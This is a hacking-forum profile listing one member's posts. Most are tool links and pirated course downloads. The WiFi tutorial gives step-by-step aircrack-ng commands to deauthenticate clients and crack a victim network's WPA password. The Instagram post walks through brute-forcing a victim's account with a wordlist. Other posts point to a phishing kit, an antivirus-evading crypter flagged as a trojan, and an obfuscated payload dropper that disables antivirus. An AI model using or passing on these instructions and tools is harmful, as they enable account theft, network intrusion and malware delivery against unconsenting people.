Eminem

Members
  • Content Count

    1,467
  • Last visited

Everything posted by Eminem

  1. So Hi guys Now this tutorial gonna cover a most awaited and wanted topic Hacking A WiFi Network Yeah hacking a WiFi network is considered as one of the most wanted hacks of all the time this tutorial gonna cover it in complete detail SO lets start guys! [hide] For this tutorial you need Kali Linux or Parrot Sec OS or even Ubuntu will work You can get Kali Linux from kali.org and i am gonna use that in this tutorial So first of all we need to update our linux distro by typing this command apt update && apt upgrade -y If you are doing it in a VM or in a enviornment in which you cant connect to wifi or if your network card does not support packet injection than you need to buy a new one you can check by googling that either your card will work for wifi hacking or not The good choice is This One you can get this for a cheap price So after the setup connect your wifi adapter with pc and than start the tutorial now type these commands First open your terminal and type these commands 1 airmon-ng check kill [to check the process to kill to start the process] 2 airmon-ng 3 airmon-ng start wlan0 {wlan0 can varry acc to your device you can see the name for your one by typing ifconfig} [make the wifi card ready for wifi hacking] 4 airodump-ng wlan0mon [starting the attack will capture everything now note the channel name and bssid of your target wifi ] 5 airodump-ng -c (ur victims channel here ) – -write /root/Desktop/hack —bssid (bssid) wlan0mon [now the attack started] 6 aireplay-ng -0 0 -a (Bssid) wlan0mon {Bssid will be of your victim} 7 aircrack-ng -a2 -b (bssid) -w /root/Desktop/rockyou.txt {file of your wordlist } /root/Desktop/hack-01.cap {path of captured file} if now the user password was in your wordlist than you will get the password is not present than try a different wordlist in the next tutorial i will tell you how to create a wordlist for a specific user and even a full proof method that give you great succes results NOTE : The 7th command will end according to your computer speed it depends on your machine power and even it can take alot long as it depends on your Wordlist and computer [/hide]
  2. NOTE : Don’t expect that you can hack whatever account you want!This is just the demonstration of how it works!For 100% work you need deeper understanding of it! So Hi, guys i am back here again with one more tutorial and one of the most awaited oneHacking Instagram Accounts [align=center] Yeah you heard it right now this tutorial not gonna include hacking the database of instagram or something very advanced [/align] [hide] So Hi, guys i am back here again with one more tutorial and one of the most awaited one Hacking Instagram Accounts Yeah you heard it right now this tutorial not gonna include hacking the database of instagram or something very advanced So lets start this So the first thing you need is Kali Linux or Parrot Sec os or any other linux OS you can download parrot os from here https://parrotsec.org and kali linux from here kali.org and thats it Now lets start the guide So the first thing you need is a net connection and brain and yeah dont forget linux any distro or flavor So lets start for the purpose of this tutorial i am gonna use the technique of brute force Brute force is the technique of trying random passwords against a single user from a pre defined chrachter set or more specificially we can say i am gonna to talk about a dictionary attack so dictionary attack is an attack in which the passwords are saved in a file from where we try these passwords on a single user Ok so lets start 1 Open Terminal 2 apt update && apt ugrade -y 3 apt-get install git {installing git to clone repo} 4 apt-get install python {installing python } 5 apt-get install python3 {installing python3} 6 cd Desktop { changing directory to desktop } 7 git clone https://github.com/Pure-L0G1C/Instagram (https://github.com/Pure-L0G1C/Instagram) {This command will clone the github repo} OK so after completition of 7th command we need to run 8 chmod +x Instagram after that run cd Instagram Now run python instagram.py -h to get the help menu Now just simply enter this command python/2/3 instagram.py USERNAME OF VICTIM /Path_of_wordlist_file [wordlist file comes already by default in linux or parrot just extract rockyou in /usr/share/wordlists and replace the path ] If the users password is in rockyou than this gonna work but if not than its your badluck but you can try other ways if you want That’s it for now stay tuned gonna post more[/hide]
  3. What you'll learn Use burp suite, capture traffic through burp and do basic web testing. Set Up their own testing environment for practicing hacking safely. understand the working of intercepting proxies and there use in ethical hacking Requirements You should be interested in ethical hacking. A pc with minimum 4 gb ram Description This course will help you to Learn the BurpSuite, the most popular web application security testing tool on planet. If you are doing penetration testing web development or you are a beginner in information security domain then it is a must tool to master .Skills learned over here will accelerate your career in security and secure application deployments .Skills you learn in this course can be immediately used in web application assessments and penetration testing. This course is 100% practical and intensive hands on, so lets strap our belts and dive in the world of web hacking. UDEMY ORIGINAL E-BOOK [hide] https://www.udemy.com/burp-suite-hackers-swiss-army-knife/ [/hide] DOWNLOAD ( TORRENT LINK ) [hide] https://drop.me/BZq9L4 [/hide]
  4. Hyperion is a runtime encrypter for 32-bit and 64-bit portable executables. It is a reference implementation and bases on the paper "Hyperion: Implementation of a PE-Crypter". Changes: Support for 64bit was added. C++ has been replaced by a more clean C implementation. More modular concept allows extensions with custom payloads. DOWNLOAD (DROP.ME) [hide] HERE [/hide] VIRUSTOTAL 4/59 [align=center]Antiy-AVL Trojan/Win32.Occamy Cyren W32/Trojan.ZGCP-7312 Endgame Malicious (moderate Confidence) Microsoft TrojanDownloader:Win32/Banload[/align] [hide] HERE [/hide]
  5. Sysdig falco is a behavioral activity monitoring agent that is open source and comes with native support for containers. Falco lets you define highly granular rules to check for activities involving file and network activity, process execution, IPC, and much more, using a flexible syntax. Falco will notify you when these rules are violated. You can think about falco as a mix between snort, ossec and strace. DOWNLOAD [hide] HERE [/hide] VIRUSTOTAL 1 / 54 [align=center]ClamAV Txt.Malware.Sustes-6779550-1[/align] [hide] HERE [/hide]
  6. Dell EMC Avamar ADMe Web Interface is affected by a local file inclusion vulnerability which may allow a malicious user to download arbitrary files from the affected system by sending a specially crafted request to the Web Interface application. Versions 1.0.50 and 1.0.51 are affected. [hide] Dell EMC Avamar ADMe Web UI 1.0.50 / 1.0.51 Local File Inclusion Restricted - Confidential -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 DSA-2019-092: Dell EMC Avamar Security Update for ADMe Web UI Vulnerability Dell EMC Identifier: DSA-2019-092 CVE Identifier: CVE-2019-3737 Severity: High Severity Rating: CVSS v3 Base Score: 8.6 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N) Affected products: DELL EMC Avamar® ADMe Web UI © 1.0.50, 1.0.51 Summary: DELL EMC Avamar® Data Migration Enabler (ADMe) Web UI requires security updates to address a local file include(LFI) vulnerability. Details: Dell EMC Avamar ADMe Web Interface is affected by an LFI vulnerability which may allow a malicious user to download arbitrary files from the affected system by sending a specially crafted request to the Web Interface application. Resolution: The following Dell EMC Avamar ADMe Web UI hotfix is to address this vulnerability for the affected versions: * EMC Avamar ADMe Web UI © 1.0.50 & 1.0.51 - HOTFIX 310397 Link to remedies: Dell EMC recommends that customers who are registered for Dell EMC Online Support download the applicable patches and software from support.emc.com at their earliest convenience: * EMC Avamar ADMe Web UI © 1.0.50 & 1.0.51 - HOTFIX 310397 If you have any questions, please contact Dell EMC Support. Credit: Dell EMC would like to thank Ken Pyle from DFDR Consulting for reporting this vulnerability. Severity Rating: For an explanation of Severity Ratings, refer to Dell EMC Knowledgebase article 468307. Dell EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability. Legal Information: Read and use the information in this Dell EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact Dell EMC Software Technical Support at 1-877-534-2867. Dell EMC distributes Dell EMC Security Advisories, in order to bring to the attention of users of the affected Dell EMC products, important security information. Dell EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. Dell EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall Dell EMC or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or spe cial damages, even if Dell EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEP5nobPoCj3pTvhAZgSlofD2Yi6cFAl0D9A0ACgkQgSlofD2Y i6fzPQ//eEi+Z6QtNAokbNsnrwbz7ee96nH+I1eE0o6nQBpeQiml0dlpKJclYlAL 9t0ofaFGANCIwGtQblFOytOyxqLr+/h/iC+o3c3nhk9ULledRL9+1ZQUeIrOxwNC Tii7QsLoGen62Zb7sg0hywpdU8TkuTjI/wNYjs/3Ro9Z59w2/kOr2ZBOvinjE6gT h7TscEgxWgudnmVZv16ot8dmQEYLUYXidu7NsiSQJmaufzGZKgmfWV8VKEFYft/h ymJw/Zyp6tQK5PrduZ1LorRI0RKvKMuVsJySzihxhcMvV4AhUu1YUf3dfxlJSemR A9FlqCzAfOENnDXSiDQKsHrLbghfhN8bjnqYVKGJB/f7wk1nnRWCjtmEwB5xnS2q 1O0qM4cNUsaBPMChcGXZkM/sftbXTxkPV/H2bCiZ4bO0YEHYo7HdFM204qSU6bMM J5Y/vuM7gOdPCwIfhvWOkoGl2KzzoOyWwG7Bx8X/TbLkxzIbxxKPQLWz9AExxrXK csez48O5AipUmkZLXtL521BnkXAYC8R3gE3ONIuxRRvCe7Az/HDfACruiRk66EzM gIj1qYS1Tnsfyca41T1Mn/mhl+YKBVx4uIxnCd4OTaJkPiff2OmFU9rGlXBjk1UR gt5trn1LopcOypjbyb6ftMDdLQCVfXtIvY1bQkrYznrXnDFvz88= =jcLF -----END PGP SIGNATURE----- [/hide]
  7. Must have a .zip or .rar compressor. [hide] Steps: 1. Save the picture of choice to your desktop. 2. Make a new .rar or .zip folder on your desktop. 3. Add the files you want to hide into the .zip or .rar 4. Click start menu, run, cmd. 5. In Command Prompt type cd "desktop" with the quotation marks. 6. Now type in copy /b picturename.jpg + foldername.rar outputfilename.jpg ( If you use .zip then: copy /b picturename.jpg + foldername.zip outputfilename.jpg) 7. Now there should be the outputed file name with a .jpg extension on the desktop. ( Do not close Command Prompt just yet ) 8. Double click it to open the picture and check it out. 9. When your done looking, and want to view the hidden files Type: ren outputfilename.jpg outputfilename.rar or zip. [/hide] You're done all!
  8. BackBox Linux is a free Open Source penetration testing and security assessment oriented Linux distribution providing a network and systems analysis toolkit. [hide] https://linux.backbox.org [/hide]
  9. [hide] https://mega.nz/?fbclid=IwAR29X1IrqTcmBFROTW93INdLxPP3n_-lTXkajxBu16UouS1eGJ7i4uuXkNY#F!AwtwWSZZ!cNxAcK_-zD6GCrS-EKyOwg [/hide]
  10. If you find yourself with a roommate hogging limited data bandwidth with video games or discover a neighbor has invited themselves into your Wi-Fi network, you can easily take back control of your internet access. Evil Limiter does this by letting you control the bit rate of any device on the same network as you, allowing you to slow or even stop data transfer speeds for them completely. DOWNLOAD [hide] https://drop.me/BZqZyx [/hide] VIRUSTOTAL 0/59 [hide] https://www.virustotal.com/gui/file/d653b93bcc9b9e3ca7a9b77a2410769e9a914365d3f642b9dfaa56774dfdc8dd/detection [/hide]
  11. [hide] Just Download DriverEasy Software on Your Pc/Lappy Go to https://www.drivereasy.com/giveaway/chip/2019/ And Confirm Mail there You also can Use Temo mail https://temp-mail.org/ After Confirming Email you'll get a Licence key On Mail Just copy that key and Paste in Drivereasy Software ? [/hide]
  12. :fiesta: :fiesta: :fiesta: :fiesta: :fiesta: :fiesta:
  13. Learn Node.js by building real-world applications with Node, Express, MongoDB, Mocha, and more! Original Udemy Link : HERE Udemy Download Link [hide] HERE [/hide]
  14. Phone numbers often contain clues to the owner's identity and can bring up a lot of data during an OSINT investigation. Starting with a phone number, we can search through a large number of online databases with only a few clicks to discover information about a phone number. It can include the carrier, the owner's name and address, and even connected online accounts. DOWNLOAD [hide] https://github.com/sundowndev/PhoneInfoga [/hide] VIRUSTOTAL 0 / 54 [hide] https://www.virustotal.com/gui/file/b123ad7117874b3134411a74bf1585086bfe9f389f49acdf56177312db997a07/detection [/hide]
  15. Phishes : Instagram | Facebook | Snapchat | Github | Twitter | Yahoo | Protonmail | Spotify | Netflix | Linkedin | Wordpress | Origin | Steam | Microsoft | InstaFollowers | Gitlab | Pinterest [hide] https://github.com/thelinuxchoice/shellphish [/hide]
  16. Usually When You Want Download Apps/Games Form Play Store it Asks To Sign In With Your Gmail..By This Tut You Can Download Them Directly! It’s Not Any App Market (1Mobile,ACMarket.etc) [hide] 1.Open play.google.com/store/ in your web browser (of your phone or PC) and search for the Application that you need. 2.From the search results, open the specific Google Play page of that application/game i.e. the detailed page which is presented to you upon clicking on an item from the search results. 3.Copy the full URL/Address of this page. 4.Open apps.evozi.com/apk-downloader/ in a new browser window or tab and paste the Google Play URL (that you copied in previous step) in the Package Name or Google Play URL Field. 5.Click on Generate Download Link. 6.The web service will take a coupe of minutes to download the application from the Google Play Store and then present you the download link. 7.Click on Click here to download [package name] to start the download of your APK file. 8.Copy it to your phone and install it the same way you do with rest of the apps. [/hide]
  17. :fiesta: :fiesta: :fiesta: :fiesta: :fiesta:
  18. So,For Internet Users..Get Free PayPal Cash In A Dollars By Data Packets! Nothing More To Do Just Browse Long!! This Is Not BTC/Crypotab [hide] https://packetstream.io/?psr=531 [/hide] [align=center]June and July 20% Referral Bonus Promo Share PacketStream with friends and you'll be credited 20% of the points they earn:smart: :smart: :smart:[/align]
  19. The BEST online course for learning iOS development with practical approach and clear explanations [hide] https://www.udemy.com/the-complete-ios10-developer-course/ [/hide]
  20. Grow your brand or business on Instagram like the pros, gain your first 10k followers for free. What you’ll learn: • Unlimited Instagram Setup Support • Expert Growth & Marketing Strategies • Viral Content Strategies • Gaining 200+ Followers Per Day • Automating Your Instagram Marketing • Organic Growth Strategies That Work • Turning Followers Into Paying Customers • Do’s & Don’t of Instagram [hide] https://mega.nz/#F!qYFzkarT!Lasrd5loIxEz6x5C90Pe6w [/hide]
  21. Access to all Cloud Platform Products Get everything you need to build and run your apps, websites and services, including Firebase and the Google Maps API. $300 credit for free Sign up and get $300 to spend on Google Cloud Platform over the next 12 months. No autocharge after free trial ends We ask you for your credit card to make sure you are not a robot. You won’t be charged unless you manually upgrade to a paid account. [hide] https://cloud.google.com/free/ [/hide]
  22. # Recsech - Web Reconnaissance Tools Recsech is a tool for doing `Footprinting and Reconnaissance` on the target web. Recsech collects information such as DNS Information, Sub Domains, HoneySpot Detected, Subdomain takeovers, Reconnaissance On Github and much more you can see in [Features in tools] . ## Features in tools | Name | Release | Release | |---------------------------|--------------------|--------------| | Auto request with Proxy | :white_check_mark: | 01/05/19 | | Find Email | :white_check_mark: | 01/05/19 | | HoneySpot Detected | :white_check_mark: | 01/05/19 | | Subdomain takeover | :white_check_mark: | 01/05/19 | | Check Technologies | :white_check_mark: | 01/05/19 | | Whois | :x: | N/A | | Crlf injection | :x: | N/A | | Header Security | :white_check_mark: | 01/05/19 | | Update Check | :white_check_mark: | 01/05/19 | | Port Scanner | :white_check_mark: | 02/05/19 | | Sort Domain By IP | :white_check_mark: | 02/05/19 | | Wordpress audit | :white_check_mark: | 05/05/19 | | Reconnaissance On Github | :white_check_mark: | 02/05/19 | | Language Selection | :white_check_mark: | 02/05/19 | | WAF | :white_check_mark: | 03/05/19 | ## Requirements for using this tool We need several requirements to use this tool to run smoothly. ##### Linux ! (https://img.shields.io/badge/PHP-7.X-success.svg "PHP 7.X")[/color][/b][/center] [center][b][color=#ffffff]![php CURL](https://img.shields.io/badge/PHP%20CURL-ALL-success.svg "PHP CURL")[/color][/b][/center] [center][b][color=#ffffff]##### Windows[/color][/b][/center] [center][b][color=#ffffff]![php CURL](https://img.shields.io/badge/XAMPP-7.3.5-success.svg "XAMPP 7.X")[/color][/b][/center] [center][b][color=#ffffff]## Installation [/color][/b][/center] [center][b][color=#ffffff]You can download the latest tarball by clicking [here](https://github.com/radenvodka/Recsech/tarball/master) or latest zipball by clicking [here](https://github.com/radenvodka/Recsech/zipball/master).[/color][/b][/center] [center][b][color=#ffffff]Preferably, you can download sqlmap by cloning the [Git](https://github.com/radenvodka/Recsech) repository:[/color][/b][/center] [center][b][color=#ffffff] git clone --depth 1 https://github.com/radenvodka/Recsech.git Recsech[/color][/b][/center] [center][b][color=#ffffff]##### Recsech Environment Windows (Command Prompt Windows) [/color][/b][/center] [center][b][color=#ffffff]Download Recsech : [/color][/b][/center] [center][b][color=#ffffff][/color][/b][/center] [center][b][color=#ffffff]How to install to Windows CLI : [/color][/b][/center] [center][b][color=#ffffff]1. Extract all files in C: \Windows[/color][/b][/center] [center][b][color=#ffffff]2. Edit Files `Recsech.bat` , then set your PHP patch (if you have installed xampp on your C drive you don't need to do this step) [/color][/b][/center] [center][b][color=#ffffff]```[/color][/b][/center] [center][b][color=#ffffff]@echo off[/color][/b][/center] [center][b][color=#ffffff]set PATH=%PATH%;C:\xampp\php[/color][/b][/center] [center][b][color=#ffffff]title Recsech - Recon and Research[/color][/b][/center] [center][b][color=#ffffff]php "C:\Windows\Recsech.php" %1[/color][/b][/center] [center][b][color=#ffffff]```[/color][/b][/center] [center][b][color=#ffffff]3. Open cmd and do the Recsech command.[/color][/b][/center] [center][b][color=#ffffff]![Recsech](https://raw.githubusercontent.com/radenvodka/Recsech/RecsechWIN/run.PNG)[/color][/b][/center] [center][b][color=#ffffff]Usage[/color][/b][/center] [center][b][color=#ffffff]----[/color][/b][/center] [center][b][color=#ffffff]Enough to execute the command :[/color][/b][/center] [center][b][color=#ffffff] php Recsech.php example.com[/color][/b][/center] [center][b][color=#ffffff]or if it doesn't work, use the command : [/color][/b][/center] [center][b][color=#ffffff] [/color][/b][/center] [center][b][b][color=#ffffff] php Recsech.php debug[/color][/b][/b][/center] [center][b][b][color=#ffffff][size=x-large]DOWNLOAD[/size][/color][/b][/b][/center] [center][b][color=#ffffff][size=x-large][hide] HERE [/hide][/size][/color][/b][/center] [align=center][b][b][size=x-large][color=#ffffff]VIRUSTOTAL (0/[/color][color=#33cc33]50[/color][/size][color=#ffffff][size=x-large]) [/size][/color][/b][/b][/align] [center][b][b][color=#ffffff][size=x-large][hide] HERE [/hide][/size][/color][/b][/b][/center] [center][b][/b][/center]
  23. This Tool Creates A Obfuscated .vbs Script To Download A Payload Hosted On A Server To %TEMP% Directory, Execute Payload And Gain Persistence + windows antivirus disabling functions. [hide] https://github.com/s1egesystems/GhostDelivery [/hide]